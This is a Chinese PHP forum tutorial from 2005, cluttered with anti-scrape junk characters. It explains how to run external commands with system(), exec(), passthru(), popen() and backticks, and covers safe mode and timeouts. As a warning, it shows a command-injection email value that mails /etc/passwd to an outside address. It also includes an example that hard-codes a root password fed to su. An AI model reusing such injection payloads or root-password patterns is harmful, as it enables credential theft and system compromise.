|
作者:Fluke 中文PHP论坛 8 m2 V4 k% }6 L/ i: c
PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。
7 p' Y% T2 G( J& \( Y/ y, M) X 那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。
: c' g5 \( z3 {0 U 是否可以?
0 [/ ?2 Y& V; t$ u* i$ @ 答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 / E, ~( t5 u9 b, L+ {; A4 e
前提条件
$ J0 A; `4 T2 { 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制: \2 n. b. I/ }1 N% E
执行外部命令
* E( C8 ~3 I7 v3 ~$ H5 P 在打开文件时有些限制 N# U3 X$ i: Z. d, \
连接MySQL数据库
" ^ _& h5 _/ O8 S 基于HTTP的认证 / }3 R" R2 K; f: g7 x
在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。
; f' {7 |, m! m/ {: ^$ e- T7 } 如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。 . e4 b$ {1 j* U7 z$ h
如何做?
$ p; y) a' J) V 在PHP中调用外部命令,可以用如下三种方法来实现: ( d* @) b: o3 T
1) 用PHP提供的专门函数 ! N8 E: a* r! y1 V# `
PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。
& n* J" T1 s5 D0 c3 W9 f8 h3 o system()
6 i/ Z3 W; A$ T$ z8 D! d; G S 原型:string system (string command [, int return_var])
! }: X' e+ x( @- O system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
: M9 R6 K \ S0 a/ _7 N2 ? 例子: / i' M, Y. X* a0 }# a
<?
% s& u* Y5 l5 X+ g" V6 o. O# r system("/usr/local/bin/webalizer/webalizer");
0 ]; R% f5 [/ \! I+ u ?>
# E9 h7 k1 E8 g: _! Z; W exec() # B- c/ Z, v6 [& y
原型:string exec (string command [, string array [, int return_var]])
* s" ?# @0 w7 `) U1 N exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。 0 G2 p6 R7 V+ O2 S# Z l
例子: q' q+ O! V x$ i* B& ~2 p* ~
<?
5 U$ N6 Z$ C& g6 @% n, p exec("/bin/ls -l");
1 y( y Y9 v7 e4 K: K exec("/bin/ls -l", $res);
4 }* x: r! }6 ` #$res是一个数据,每个元素代表结果的一行 & R$ V- |) Z: ^4 {
exec("/bin/ls -l", $res, $rc);
; C) k3 Q, z/ {: f #$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
% x- C3 R- H: {, [$ \' f- h ?> * W& q, {3 ], W$ k
passthru() ; }: h% e0 Q, b3 ~) X. M
原型:void passthru (string command [, int return_var]) ! Z' D- F6 _+ t# R
passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。 6 `* m/ U5 Q8 z
例子: . \0 Q6 S8 ~4 s
<?
6 w/ c+ @1 z: p g" P+ t& l; D header("Content-type: image/gif"); ! C; j) i: m8 e: S }
passthru("./ppmtogif hunte.ppm");
1 [4 a3 \% N/ V4 o9 q9 m. m ?> 1 K2 [& y0 k8 T# }6 ]
2) 用popen()函数打开进程 5 n; z7 z5 Q% T' f: P0 S) c, f
上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。
0 Z8 h+ n0 K& Q" M# o: x popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。 + R! v; M: k$ Q: Z/ }
例子1:
) x# U2 ^* x- J: @. @* Z w X0 k) e <? / Y7 S, x, G) [5 f7 q% T
$fp=popen("/bin/ls -l", "r"); " o, d& I' [, @, z# M
?> 4 F T; I6 V3 f/ K- \% a
例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51):
7 q' ?' w. o0 u% |# O <?
! a# ^- T ?2 l5 U$ M' d/ D4 {. C) Z /* PHP中如何增加一个系统用户 ; i0 L# x1 a0 n( {4 _+ o
下面是一段例程,增加一个名字为james的用户,
) u7 j& T) o1 f% y% v$ I- T8 q* K; @ root密码是 verygood。仅供参考 1 a' w2 R0 v+ m# Z# \1 I2 l' D9 V
*/ - J1 q9 x8 f9 x! G2 a
$sucommand = "su --login root --command";
" L! m1 w9 N, w; e $useradd = "useradd "; # F( V" O* B3 x4 U
$rootpasswd = "verygood"; 6 S3 o0 [9 u6 M2 p+ f
$user = "james";
4 O8 R" u* z" {. V, g+ _) h! b $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
6 ^/ L1 x2 d, f' m% i. e+ N4 c $fp = @popen($user_add,"w");
" |( v. t7 r' J7 L- | @fputs($fp,$rootpasswd);
: B3 a) i2 u0 n' S2 J0 W) A @pclose($fp); & q1 t! g0 G, c; J
?> " m6 o, D! g" w( h4 x
3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面) . {2 E$ F3 Q; P
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如: / N3 V9 z2 q5 I6 f9 Z, D3 z/ R3 }
<?
. h5 g' k( Y2 }9 o. B $res=`/bin/ls -l`;
5 G: I7 e4 r; |( C1 t( X4 o echo '<b><pre>'.$res.'</pre></b>';
7 A k* e* B. a0 O) N ?>
& T6 f6 O. ?- U! p& e' |; a 这个脚本的输出就象: 0 M/ N0 ]6 e- R- V; E \4 e B
hunte.gif
f& K# F8 p7 @6 k; m. k: B6 H+ R8 R, Y hunte.ppm
. V/ \, y, @/ Y, m% e9 d jpg.htm 2 Z7 |7 e' Z2 o+ X& b0 D7 j/ D
jpg.jpg - |# H: s8 T/ D! \" _
passthru.php
5 G+ E$ h$ R4 W6 X/ f5 ^ 要考虑些什么? 5 n' u" e5 D( @, H1 x5 l
要考虑两个问题:安全性和超时。 5 T- K) Z" c3 V% z/ c4 u, {( N* D
先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样: 3 O% H, X- W) P3 P. p, ^
<?
" E8 Z0 D/ n4 G" { system("mail $to < products.txt");
" ^9 ~5 h3 L% t echo "我们的产品目录已经发送到你的信箱:$to";
% z. N1 K: E C# v- q6 {% p ?>
/ I: y0 i/ c9 T$ K' d1 Z 用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址: 7 t6 Y# c' }6 t$ {6 A/ [; F
'--bla ; mail someone@domain.com < /etc/passwd ;' * y" P! E U, G9 Z% O8 ?
那么这条命令最终变成: 1 |+ z; b# Q, Z
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt' ! e+ a- I/ N+ P5 j
我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。 , q& i: c9 l+ i4 C
幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。 % a, y$ S1 \" Z9 k
再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:
8 M f$ J7 `* E# _9 e t <?
; V# K7 R) n/ L2 h. ^ system("/usr/local/bin/order_proc > /tmp/null &");
5 J! @: V" l( }. M ?>' m5 Q" k7 d8 K; ]' `6 n% s0 n& v
| 
IP卡
狗仔卡
发表于 2005-1-16 11:34
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
